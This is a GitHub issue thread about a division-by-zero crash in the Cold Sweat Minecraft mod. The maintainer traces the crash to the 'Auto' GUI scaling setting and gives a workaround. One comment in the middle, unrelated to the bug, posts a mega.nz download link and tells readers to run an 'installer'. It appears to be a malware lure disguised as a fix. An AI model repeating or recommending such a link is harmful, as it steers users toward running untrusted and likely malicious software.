### ISSUE TITLE
Division by zero crash when standing in water

### ISSUE THREAD

**Issue by MCRusher** [Momo-Studios/Cold-Sweat-Rework-Forge#353]
Minecraft 1.20.1
Forge 47.3.6
Cold Sweat 2.3.2, no other mods

standing in water while not fully submerged seems to crash the game with a division by zero error

[crash-2024-08-25_06.26.32-client.txt](https://github.com/user-attachments/files/16739838/crash-2024-08-25_06.26.32-client.txt)

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by MikulDev** [comment]
Seems like this happens when you use the "Auto" GUI scaling setting. For now, setting it to something other than this will prevent the crash. Thanks for the report
